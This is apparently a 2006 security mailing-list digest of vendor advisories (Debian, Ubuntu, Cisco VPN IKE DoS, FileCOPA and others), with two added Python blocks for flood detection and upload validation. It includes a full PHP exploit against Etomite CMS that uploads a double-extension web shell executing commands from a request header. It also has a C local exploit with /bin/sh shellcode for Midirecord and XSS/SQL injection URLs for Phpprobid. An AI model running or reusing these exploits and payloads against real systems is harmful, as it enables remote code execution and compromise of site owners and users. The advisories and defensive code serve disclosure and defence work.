http://security.debian.org/pool/updates/main/d/drupal/drupal_4.5.3-6.1sarge1.dsc
    Size/MD5 checksum:    625 8323ad6164c5beb6e9c7631272fbaee8
http://security.debian.org/pool/updates/main/d/drupal/drupal_4.5.3-6.1sarge1.diff.gz
    Size/MD5 checksum:  83802 35863480a9da96adbe6731b014d204c8
http://security.debian.org/pool/updates/main/d/drupal/drupal_4.5.3.orig.tar.gz
    Size/MD5 checksum: 471540 bf093c4c8aca7bba62833ea1df35702f

Architecture independent components:

http://security.debian.org/pool/updates/main/d/drupal/drupal_4.5.3-6.1sarge1_all.deb
    Size/MD5 checksum: 506884 e4cdba2730662752d8f83fc101ab58a5

These files will probably be moved into the stable distribution on its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
Cisco VPN Concentrator IKE resource exhaustion DoS Advisory
Cisco VPN Concentrator IKE resource exhaustion DoS Advisory

1. Overview

NTA Monitor discovered a denial of service vulnerability in the Cisco VPN 3000 series concentrator products while performing a VPN security test for a customer in July 2005. The vulnerability affects Phase-1 of the IKE protocol. Both Main Mode and Aggressive Mode over both UDP and TCP transports are affected.

The vulnerability allows an attacker to exhaust the IKE resources on a VPN concentrator by sending a high rate of IKE requests, which will prevent valid clients from connecting or re-keying. The attack does not require high bandwidth, so one attacker could potentially target many concentrators.

The mechanism behind this vulnerability is similar to the well-known TCP SYN flood vulnerability.

2. Vulnerability Details

The vulnerability allows an attacker to exhaust the IKE resources on a remote VPN concentrator by starting new IKE sessions faster than the concentrator expires them from its queue. By doing this, the attacker fills up the concentrator's queue, which prevents it from handling valid IKE requests.

The exploit involves sending IKE Phase-1 packets containing an acceptable transform. It is not necessary to have valid credentials in order to exploit this vulnerability, as the problem occurs before the authentication stage. The vulnerability affects both Main Mode and Aggressive Mode, and both normal IKE over UDP and Cisco proprietary TCP-encapsulated IKE.

In order to exploit the vulnerability, the attacker needs to send IKE packets at a rate which exceeds the Concentrator's IKE session expiry rate. Tests show that the target concentrator starts to be affected at a rate of 2 packets per second, and becomes unusable at 10 packets per second. As a minimal Main Mode packet with a single transform is 112 bytes long, 10 packets per second corresponds to a data rate of slightly less than 9,000 bits per second.

The concentrator will remain unable to process IKE requests as long as the flow of packets continues. Once the flow stops, the concentrator will return to normal operation as the negotiation queue drains.

It is not normally possible to block public inbound access to the IKE service on the VPN concentrator, because it is required for remote access IPsec operation. As IKE normally uses the UDP transport protocol, the attacker may forge the packet's source IP address to avoid identification, or to prevent the victim from blocking the traffic with ingress filtering. In addition, IDS/IPS systems will probably not be able to detect the attack, because the packets are valid IKE packets.

It is possible for attackers to detect and fingerprint Cisco VPN concentrators using the IKE fingerprinting techniques that we have previously published in VPN security white papers. Therefore users should not assume that their concentrator is invisible just because it's not published in the DNS and is not running any TCP services.

The symptoms are that the target concentrator won't respond to IKE requests from any source when all the negotiation slots are filled. This means that new clients will be unable to connect, and Phase-1 re-keying attempts will fail. It is not known if Phase-2 re-keying is also affected. Traffic over existing VPN tunnels should not be affected until they need to re-key.

The mechanism behind this vulnerability is similar to that behind the well-known TCP SYN flood issue. In both cases the target system has a stateful mechanism for recording outstanding negotiations, uses a fixed-size list to store negotiations in progress, and does not require any authentication in order to start a negotiation.

3. Example

We are not planning to release examples of how to exploit this vulnerability until it has been addressed and users have had an opportunity to apply the fix or workaround.

4. Affected Versions

The issue is believed to affect all models of Cisco VPN 3000 Concentrator: 3005, 3015, 3020, 3030, 3060 and 3080. It is suspected that other Cisco products that support IKE may also be affected, but this has not been confirmed.

5. Solution

There is no known fix or workaround at this time.

6. Timeline

The vulnerability was first discovered on 4th July 2005, and was reported to Cisco's security team (PSIRT) the same day. Cisco responded on 9th August 2005, but no further progress has been made.

7. References

NTA Monitor advisory
http://www.nta-monitor.com/posts/2006/07/cisco-concentrator-dos.html

Roy Hills
NTA Monitor Ltd

--
Roy Hills                                    Tel: +44 1634 721855
NTA Monitor Ltd                              FAX: +44 1634 721844
14 Ashford House, Beaufort Court,
Medway City Estate,                          Email: [EMAIL PROTECTED]
Rochester, Kent ME2 4FA, UK                  WWW: http://www.nta-monitor.com/
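The advisory notes that the flood consists of valid IKE packets, so signature-based IDS will not see it; what a defender can watch is the rate of new Phase-1 negotiations arriving at each concentrator. The following is an added example (not NTA Monitor's or Cisco's code) that parses the ISAKMP header, counts Phase-1 initiations per destination per second, and alerts at the 2 pps and 10 pps rates the advisory reports; the packets and addresses are constructed fixtures.

```python
"""Rate-based detection of IKE Phase-1 initiation floods (added example).

The only distinguishing signal of the flood described above is volume:
new Phase-1 negotiations per concentrator per second. Thresholds follow
the advisory (2 pps degrades service, 10 pps makes it unusable).
"""
import os
import struct
from collections import Counter

# ISAKMP header (RFC 2408 section 3.1): 28 bytes, network byte order.
# initiator cookie(8) responder cookie(8) next payload(1) version(1)
# exchange type(1) flags(1) message ID(4) length(4)
ISAKMP_HDR = struct.Struct("!8s8sBBBBII")
EXCH_MAIN_MODE = 2        # "Identity Protection" exchange
EXCH_AGGRESSIVE = 4
ZERO_COOKIE = b"\x00" * 8
WARN_PPS = 2              # concentrator "starts to be affected"
CRIT_PPS = 10             # concentrator "becomes unusable"


def parse_isakmp_header(payload):
    """Return the ISAKMP header fields as a dict, or None if the datagram is too short."""
    if len(payload) < ISAKMP_HDR.size:
        return None
    i_ck, r_ck, nxt, ver, exch, flags, msg_id, length = ISAKMP_HDR.unpack_from(payload)
    return {"initiator_cookie": i_ck, "responder_cookie": r_ck,
            "next_payload": nxt, "version": ver, "exchange": exch,
            "flags": flags, "message_id": msg_id, "length": length}


def is_phase1_initiation(hdr):
    """First message of a new Phase-1 SA: responder cookie still zero,
    message ID 0, and a Main Mode or Aggressive Mode exchange type."""
    return (hdr is not None
            and hdr["responder_cookie"] == ZERO_COOKIE
            and hdr["message_id"] == 0
            and hdr["exchange"] in (EXCH_MAIN_MODE, EXCH_AGGRESSIVE))


def classify_rate(pps):
    """Map an initiations-per-second count to an alert level (or None)."""
    if pps >= CRIT_PPS:
        return "critical"
    if pps >= WARN_PPS:
        return "warning"
    return None


def detect_initiation_floods(packets):
    """packets: iterable of (timestamp_seconds, dst_ip, payload_bytes).

    Counts Phase-1 initiations per destination per one-second bucket and
    returns alerts as (bucket, dst_ip, count, level). Source addresses are
    deliberately ignored: the advisory notes they may be spoofed over UDP,
    so per-source limits would not catch the flood.
    """
    buckets = Counter()
    for ts, dst, payload in packets:
        if is_phase1_initiation(parse_isakmp_header(payload)):
            buckets[(int(ts), dst)] += 1
    alerts = []
    for (bucket, dst), count in sorted(buckets.items()):
        level = classify_rate(count)
        if level:
            alerts.append((bucket, dst, count, level))
    return alerts


def flood_bandwidth_bps(packet_bytes=112, pps=10):
    """Bandwidth the flood needs: 112-byte packets at 10 pps is 8960 bps,
    the "slightly less than 9,000 bits per second" of the advisory."""
    return packet_bytes * pps * 8


def make_phase1_init(exchange=EXCH_MAIN_MODE, total_len=112):
    """Constructed test fixture (not a real negotiation): an ISAKMP header
    with a fresh initiator cookie and zero padding in place of the SA payload."""
    body = b"\x00" * (total_len - ISAKMP_HDR.size)
    hdr = ISAKMP_HDR.pack(os.urandom(8), ZERO_COOKIE, 1, 0x10, exchange, 0, 0, total_len)
    return hdr + body


def sample_traffic():
    """Constructed capture: one legitimate client at t=0, a 12 pps burst of
    Aggressive Mode initiations at t=5, plus one later-phase message that
    already carries a responder cookie and must not be counted."""
    conc = "198.51.100.1"   # documentation address standing in for the concentrator
    pkts = [(0.0, conc, make_phase1_init())]
    pkts += [(5.0 + k / 12, conc, make_phase1_init(EXCH_AGGRESSIVE)) for k in range(12)]
    later = bytearray(make_phase1_init())
    later[8:16] = b"\x11" * 8
    pkts.append((5.5, conc, bytes(later)))
    return pkts


if __name__ == "__main__":
    for bucket, dst, count, level in detect_initiation_floods(sample_traffic()):
        print(f"t={bucket}s {dst}: {count} Phase-1 initiations/s -> {level}")
    print("flood bandwidth:", flood_bandwidth_bps(), "bps")
```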
Etomite CMS <= 0.6.1 'rfiles.php' remote command execution
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "Etomite CMS <= 0.6.1 'rfiles.php' remote command execution\r\n";
echo "by rgod [EMAIL PROTECTED]\r\n";
echo "site: http://retrogod.altervista.org\r\n";
echo "google dork: \"Content managed by the Etomite Content Management System\"\r\n\r\n";

/* works regardless of php.ini settings */

if ($argc<4) {
  echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
  echo "host:  target server (ip/hostname)\r\n";
  echo "path:  path to etomite\r\n";
  echo "Options:\r\n";
  echo "  -p[port]:    specify a port other than 80\r\n";
  echo "  -P[ip:port]: specify a proxy\r\n";
  echo "Examples:\r\n";
  echo "php ".$argv[0]." localhost /etomite/ \r\n";
  echo "php ".$argv[0]." localhost / -P1.1.1.1:80\r\n";
  die;
}

/* software site: http://www.etomite.org/

   explanation: if you can call directly rfiles.php script you can upload
   an image file, then you can rename it with .php extension, so you
   launch commands... */

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string) {
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++) {
    if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
      {$result.="  .";}
    else
      {$result.="  ".$string[$i];}
    if (strlen(dechex(ord($string[$i])))==2)
      {$exa.=" ".dechex(ord($string[$i]));}
    else
      {$exa.=" 0".dechex(ord($string[$i]));}
    $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
  return $exa."\r\n".$result;
}

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacketii($packet) {
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
    $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
    }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}

function make_seed() {
  list($usec, $sec) = explode(' ', microtime());
  return (float) $sec + ((float) $usec * 10);
}

$host=$argv[1];
$path=$argv[2];
$cmd="";
$port=80;
$proxy="";
for ($i=3; $i<=$argc-1; $i++){
  $temp=$argv[$i][0].$argv[$i][1];
  if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
  if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); }
  if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); }
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

srand(make_seed());
$anumber = rand(1,999);
$valid = array('gif', 'jpg', 'jpeg', 'png');
for ($i=0; $i<count($valid); $i++) {
  $data='-7d6341a4e0c5a
Content-Disposition: form-data; name="lang"

en
-7d6341a4e0c5a
Content-Disposition: form-data; name="param"

upload
-7d6341a4e0c5a
Content-Disposition: form-data; name="flist"

1
-7d6341a4e0c5a
Content-Disposition: form-data; name="cimg"


-7d6341a4e0c5a
Content-Disposition: form-data; name="ilibs"

/
-7d6341a4e0c5a
Content-Disposition: form-data; name="randomParam"

w=150&h=150&zc=1
-7d6341a4e0c5a
Content-Disposition: form-data; name="popClassName"

default
-7d6341a4e0c5a
Content-Disposition: form-data; name="popTitle"


-7d6341a4e0c5a
Content-Disposition: form-data; name="in_srcnew"


-7d6341a4e0c5a
Content-Disposition: form-data; name="in_dirnew"


-7d6341a4e0c5a
Content-Disposition: form-data; name="nfile[]"; filename="suntzu'.$anumber.'.php.'.$valid[$i].'"
Content-Type:

<?php set_time_limit(0);echo "my_delim";passthru($_SERVER[HTTP_CLIENT_IP]);echo "my_delim";?>
-7d6341a4e0c5a
Content-Disposition: form-data; name="chkThumbSize[0]"

0
-7d6341a4e0c5a
Content-Disposition: form-data; name="selRotate"


-7d6341a4e0c5a
Content-Disposition: form-data; name="pr_title"


-7d6341a4e0c5a
Content-Disposition: form-data; name="pr_alt"


-7d6341a4e0c5a
Content-Disposition: form-data; name="pr_class"

default
-7d6341a4e0c5a
Content-Disposition: form-data; name="pr_align"
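The exploit's own comment names the two weaknesses it relies on: the image browser accepts "name.php.gif" because only the final extension is checked, and the stored file can then be renamed to ".php". The following is an added example (not Etomite's code) of an upload-name policy that closes both gaps; the extension lists and the helper names are this example's assumptions.

```python
"""Upload-name and rename policy for an image upload handler (added example).

Two checks the Etomite exploit above depends on being absent:
  1. every dot-separated suffix is inspected, not just the last one, so
     "suntzu123.php.gif" is refused (Apache with mod_mime can map any of the
     extensions of a multi-extension file to a handler; see CVE-2006-2743 above);
  2. a rename may change the stem of a stored file but never its extension.
"""
import os
import re

IMAGE_EXTS = {"gif", "jpg", "jpeg", "png"}
# Extensions a web server may hand to an interpreter; never allowed anywhere in a name.
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar",
                   "cgi", "pl", "asp", "aspx", "jsp", "sh"}
SAFE_CHARS = re.compile(r"[^A-Za-z0-9_-]")


class UploadRejected(ValueError):
    """Raised with a short reason when a name fails policy."""


def extensions_of(filename):
    """All dot-separated suffixes, lower-cased: 'a.php.gif' -> ['php', 'gif']."""
    parts = os.path.basename(filename).split(".")
    return [p.lower() for p in parts[1:]]


def validate_image_name(filename):
    """Return a canonical stored name (stem.ext, one extension) or raise UploadRejected."""
    base = os.path.basename(filename)          # drop any client-supplied directory part
    exts = extensions_of(base)
    if not exts:
        raise UploadRejected("no extension")
    if exts[-1] not in IMAGE_EXTS:
        raise UploadRejected("not an image extension")
    if any(e in EXECUTABLE_EXTS for e in exts):
        raise UploadRejected("executable extension inside name")
    stem = SAFE_CHARS.sub("_", base.split(".")[0]) or "file"
    return f"{stem}.{exts[-1]}"                # collapse to a single, known extension


def validate_rename(old_name, new_name):
    """Renames may change the stem only; the extension was fixed at upload time."""
    new_canon = validate_image_name(new_name)  # new name must itself pass upload policy
    if extensions_of(new_canon)[-1] != extensions_of(old_name)[-1]:
        raise UploadRejected("extension change on rename")
    return new_canon


def upload_decision(filename):
    """('accepted', stored_name) or ('rejected', reason) for a proposed upload."""
    try:
        return ("accepted", validate_image_name(filename))
    except UploadRejected as exc:
        return ("rejected", str(exc))


def rename_decision(old_name, new_name):
    """('accepted', stored_name) or ('rejected', reason) for a proposed rename."""
    try:
        return ("accepted", validate_rename(old_name, new_name))
    except UploadRejected as exc:
        return ("rejected", str(exc))


if __name__ == "__main__":
    # Constructed sample names, including the pattern the exploit uploads.
    for name in ["photo.gif", "My Photo.JPG", "suntzu123.php.gif", "shell.php"]:
        print(f"upload {name!r}: {upload_decision(name)}")
    print("rename suntzu123.gif -> suntzu123.php:", rename_decision("suntzu123.gif", "suntzu123.php"))
```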
[ECHO_ADV_41$2006] BufferOverflow in Midirecord2
ECHO_ADV_41$2006

---------------------------------------------------------------------------
[ECHO_ADV_41$2006] BufferOverflow in Midirecord2
---------------------------------------------------------------------------

Author        : Dedi Dwianto
Date          : July, 25th 2006
Location      : Indonesia, Jakarta
Web           : http://advisories.echo.or.id/adv/adv41-theday-2006.txt
Exploitation  : Local
Critical Lvl  : High

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Midirecord
version     : 2
URL         : http://tuma.stc.cx/progs.php
Description :
Midirecord is a simple command-line application to record a MIDI file with your MIDI keyboard. It also features automatic recording to a MIDI file when you play electric piano, and thus it may be used as a recording daemon.

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~

The function daemon is affected by a buffer overflow which could allow an attacker to execute malicious code from local. The problem is caused by the copying of a string of max 10 bytes in the filename buffer of only 50 bytes.

--midirecord.cc--

void daemon(FILE* fin)
{
    char filename[50];
    printf("Waiting for note-on event.\n");
    while(cont)
    {
        unsigned char status;
        fread(&status, 1, 1, fin); // read status
        if(status>>4 == 0x9)
        {
            get_datestr(filename);
            printf("Starting to record to %s.\n", filename);
            recordmidi(fin, filename);
            if(cont) printf("Finished. Starting to wait for note-on event.\n");
        }
    }
}

--

POC:

$ gdb midirecord
GNU gdb 6.3-debian
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".

(gdb) r `perl -e 'print "A" x 1'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/midirecord2c/midirecord `perl -e 'print "A" x 1'`
Waiting for note-on event.

Program received signal SIGSEGV, Segmentation fault.
0xb7dcb4b0 in fread () from /lib/tls/i686/cmov/libc.so.6
(gdb)

---Exploit Code---

/* Successful Exploit in Ubuntu Breezy */
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUFSIZE 225
#define ALIGNMENT 1

int main(int argc, char **argv)
{
    char shellcode[] =
        "\x6a\x17\x58\x31\xdb\xcd\x80"
        "\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80";

    if (argc < 2) {
        fprintf(stderr, "Use : %s path_to_vuln\n", argv[0]);
        return 0;
    }

    char *env[] = { shellcode, NULL };
    char buf[BUFSIZE];
    int i;
    int *ap = (int *)(buf + ALIGNMENT);
    int ret = 0xbffa - strlen(shellcode) - strlen(argv[1]);

    /* fill the argument buffer with the guessed return address */
    for (i = 0; i < BUFSIZE - 4; i += 4)
        *ap++ = ret;

    execle(argv[1], "/dev/midi1", buf, NULL, env);
}

---------------------------------------------------------------------------

Shoutz:
~~~~~~~
~ y3dips,moby,comex,z3r0byt3,K-158,c-a-s-e,S`to,lirva32,anonymous
~ My Lovely Jessy
~ [EMAIL PROTECTED]
~ #aikmel #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------

Contact:
Dedi Dwianto || echo|staff || the_day[at]echo[dot]or[dot]id
Homepage: http://theday.echo.or.id/

[ EOF ]
[USN-323-1] mozilla vulnerabilities
===========================================================
Ubuntu Security Notice USN-323-1                July 25, 2006
mozilla vulnerabilities
CVE-2006-2775, CVE-2006-2776, CVE-2006-2777, CVE-2006-2778,
CVE-2006-2779, CVE-2006-2780, CVE-2006-2781, CVE-2006-2782,
CVE-2006-2783, CVE-2006-2784, CVE-2006-2785, CVE-2006-2786,
CVE-2006-2787
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.04
Ubuntu 5.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 5.04:
  mozilla-browser   2:1.7.13-0ubuntu05.04.1
  mozilla-mailnews  2:1.7.13-0ubuntu05.04.1
  mozilla-psm       2:1.7.13-0ubuntu05.04.1

Ubuntu 5.10:
  mozilla-browser   2:1.7.13-0ubuntu5.10.1
  mozilla-mailnews  2:1.7.13-0ubuntu5.10.1
  mozilla-psm       2:1.7.13-0ubuntu5.10.1

After a standard system upgrade you need to restart Mozilla to effect the necessary changes.

Details follow:

Jonas Sicking discovered that under some circumstances persisted XUL attributes are associated with the wrong URL. A malicious web site could exploit this to execute arbitrary code with the privileges of the user. (MFSA 2006-35, CVE-2006-2775)

Paul Nickerson discovered that content-defined setters on an object prototype were getting called by privileged UI code. It was demonstrated that this could be exploited to run arbitrary web script with full user privileges (MFSA 2006-37, CVE-2006-2776). A similar attack was discovered by moz_bug_r_a4 that leveraged SelectionObject notifications that were called in privileged context. (MFSA 2006-43, CVE-2006-2777)

Mikolaj Habryn discovered a buffer overflow in the crypto.signText() function. By tricking a user to visit a site with an SSL certificate with specially crafted optional Certificate Authority name arguments, this could potentially be exploited to execute arbitrary code with the user's privileges. (MFSA 2006-38, CVE-2006-2778)

The Mozilla developer team discovered several bugs that lead to crashes with memory corruption. These might be exploitable by malicious web sites to execute arbitrary code with the privileges of the user. (MFSA 2006-32, CVE-2006-2779, CVE-2006-2780)

Masatoshi Kimura discovered a memory corruption (double-free) when processing a large VCard with invalid base64 characters in it. By sending a maliciously crafted set of VCards to a user, this could potentially be exploited to execute arbitrary code with the user's privileges. (MFSA 2006-40, CVE-2006-2781)

Chuck McAuley reported that the fix for CVE-2006-1729 (file stealing by changing input type) was not sufficient to prevent all variants of exploitation. (MFSA 2006-41, CVE-2006-2782)

Masatoshi Kimura found a way to bypass web input sanitizers which filter out JavaScript. By inserting 'Unicode Byte-order-Mark (BOM)' characters into the HTML code (e. g. 'scr[BOM]ipt'), these filters might not recognize the tags anymore; however, Mozilla would still execute them since BOM markers are filtered out before processing the page. (MFSA 2006-42, CVE-2006-2783)

Paul Nickerson noticed that the fix for CVE-2005-0752 (JavaScript privilege escalation on the plugins page) was not sufficient to prevent all variants of exploitation. (MFSA 2006-36, CVE-2006-2784)

Paul Nickerson demonstrated that if an attacker could convince a user to right-click on a broken image and choose "View Image" from the context menu then he could get JavaScript to run on a site of the attacker's choosing. This could be used to steal login cookies or other confidential information from the target site. (MFSA 2006-34, CVE-2006-2785)

Kazuho Oku discovered various ways to perform HTTP response smuggling when used with certain proxy servers. Due to different interpretation of nonstandard HTTP headers in Mozilla and the proxy server, a malicious web site can exploit this to send back two responses to one request. The second response could be used to steal login cookies or other sensitive data from another opened web site.
(MFSA 2006-33, CVE-2006-2786)

Updated packages for Ubuntu 5.04:
[vuln.sg] PowerArchiver DZIPS32.DLL Buffer Overflow Vulnerability
[vuln.sg] Vulnerability Research Advisory

PowerArchiver DZIPS32.DLL Buffer Overflow Vulnerability

by Tan Chew Keong
Release Date: 2006-07-25

Summary
-------
A vulnerability has been found in PowerArchiver. When exploited, the vulnerability allows execution of arbitrary code when the user adds a file to a malicious ZIP archive.

Tested Version
--------------
PowerArchiver version 9.62.03 (English)

Details
-------
http://vuln.sg/powarc962-en.html
[OpenPKG-SA-2006.014] OpenPKG Security Advisory (shiela)
________________________________________________________________________

OpenPKG Security Advisory                            The OpenPKG Project
http://www.openpkg.org/security/                     http://www.openpkg.org
[EMAIL PROTECTED]                                    [EMAIL PROTECTED]
OpenPKG-SA-2006.014                                  25-Jul-2006
________________________________________________________________________

Package:             shiela
Vulnerability:       arbitrary code execution
OpenPKG Specific:    no

Affected Releases:   Affected Packages:           Corrected Packages:
OpenPKG CURRENT      <= shiela-1.1.6-20051003     >= shiela-1.1.7-20060725
OpenPKG 2-STABLE     <= shiela-1.1.6-2.20060622   >= shiela-1.1.6-2.20060725
OpenPKG 2.5-RELEASE  <= shiela-1.1.6-2.5.0        >= shiela-1.1.6-2.5.1

Description:
  Brian Caswell from Sourcefire discovered [0] vulnerabilities in OSSP Shiela [1], a CVS repository access control and logging extension. The vulnerabilities allow arbitrary code execution during CVS file commits if a filename is specially crafted to contain shell commands. The Common Vulnerabilities and Exposures (CVE) project assigned the id CVE-2006-3633 [2] to the problem.

  Notice: OSSP shiela might be installed as a _copy_ into your CVSROOT area. If this is the case please do not forget to update this copy after updating the OpenPKG shiela package.

References:
  [0] http://www.sourcefire.com/services/advisories.html
  [1] http://www.ossp.org/pkg/tool/shiela/
  [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3633
________________________________________________________________________

For security reasons, this advisory was digitally signed with the OpenPGP public key "OpenPKG [EMAIL PROTECTED]" (ID 63C4CB9F) of the OpenPKG project which you can retrieve from http://pgp.openpkg.org and hkp://pgp.openpkg.org. Follow the instructions on http://pgp.openpkg.org for details on how to verify the integrity of this advisory.
Secunia Research: FileCOPA Directory Argument Handling Buffer Overflow
======================================================================
                     Secunia Research 25/07/2006

      - FileCOPA Directory Argument Handling Buffer Overflow -

======================================================================
Table of Contents

1) Affected Software
2) Severity
3) Vendor's Description of Software
4) Description of Vulnerability
5) Solution
6) Time Table
7) Credits
8) References
9) About Secunia
10) Verification

======================================================================
1) Affected Software

FileCOPA 1.01 released 2006-07-18.

NOTE: Other versions may also be affected.

======================================================================
2) Severity

Rating: Moderate (High with anonymous access enabled)
Impact: System compromise
Where:  Remote

======================================================================
3) Vendor's Description of Software

"FileCOPA takes the hard work out of running an FTP Server. The FileCOPA FTP Server Software installs on any version of the Microsoft Windows operating system with just a few clicks of the mouse and automatically configures itself for anonymous operation."

Product Link:
http://www.filecopa.com/

======================================================================
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in FileCOPA, which can be exploited by malicious users to compromise a vulnerable system.

The vulnerability is caused due to an integer underflow error in the FTP service (filecpnt.exe) when processing directory arguments passed to certain FTP commands (e.g. CWD, DELE, MDTM, and MKD). This can be exploited to cause a stack-based buffer overflow by passing a specially crafted, overly long argument to one of the affected FTP commands.

Successful exploitation allows execution of arbitrary code.

======================================================================
5) Solution

Update to version 1.01 released 2006-07-21.

======================================================================
6) Time Table

21/07/2006 - Vendor notified.
21/07/2006 - Vendor response.
25/07/2006 - Public disclosure.

======================================================================
7) Credits

Discovered by Carsten Eiram, Secunia Research.

======================================================================
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2006-3768 for the vulnerability.

======================================================================
9) About Secunia

Secunia collects, validates, assesses, and writes advisories regarding all the latest software vulnerabilities disclosed to the public. These advisories are gathered in a publicly available database at the Secunia website:

http://secunia.com/

Secunia offers services to our customers enabling them to receive all relevant vulnerability information to their specific system configuration.

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/secunia_security_advisories/

======================================================================
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2006-55/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================
Phpprobid <= 5.24 XSS / SQL injection Vulnerability
Phpprobid 5.24
http://www.phpprobid.com

-- Cross Site Scripting (XSS) --

http://target.xx/auctionsearch.php?advsrc=";<script>alert(/EllipsisSecurityTest/)</script>
http://target.xx/auctionsearch.php?start=1&advsrc=";<script>alert(/EllipsisSecurityTest/)</script>

- SQL injection -

http://target.xx/viewfeedback.php?view=1'[SQL]
http://target.xx/viewfeedback.php?view=all&start=1'[SQL]
http://target.xx/categories.php?parent=&start=&orderField=itemname&orderType=1'[SQL]

- Ellipsis Security
http://www.ellsec.org
Re: new shell bypass safe mode
This is an old safe_mode bypass. But you can only bypass safe mode in php 4.4.2 and 5.1.2 and prior.

Your exploit code is just a copy, with little changes, of
http://securityreason.com/achievement_exploitalert/8
based on SecurityReason Advisory
http://securityreason.com/achievement_securityalert/37

CVE: CVE-2006-1608

Regards
SecurityReason